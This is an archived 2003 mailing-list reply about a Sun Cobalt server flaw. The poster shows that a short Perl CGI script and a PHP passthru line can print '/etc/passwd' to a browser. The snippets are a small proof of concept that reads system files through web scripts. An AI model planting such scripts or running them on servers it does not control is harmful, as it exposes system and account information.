[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [cobalt-users] MAJOR BUG, Browse any directory view any file
- Subject: Re: [cobalt-users] MAJOR BUG, Browse any directory view any file
- From: "Fragga" <fragga@xxxxxxxxxxxx>
- Date: Wed May 28 06:22:01 2003
- List-id: Mailing list for users to share thoughts on Sun Cobalt products. <cobalt-users.list.cobalt.com>
#!/usr/bin/perl
print "Content-type: text/html\n\n";
print "<PRE>";
print `cat /etc/passwd`;
print "</PRE>";
and the same in php --
<PRE>
<? passthru("cat /etc/passwd"); ?>
</PRE>
yeah ?
fragga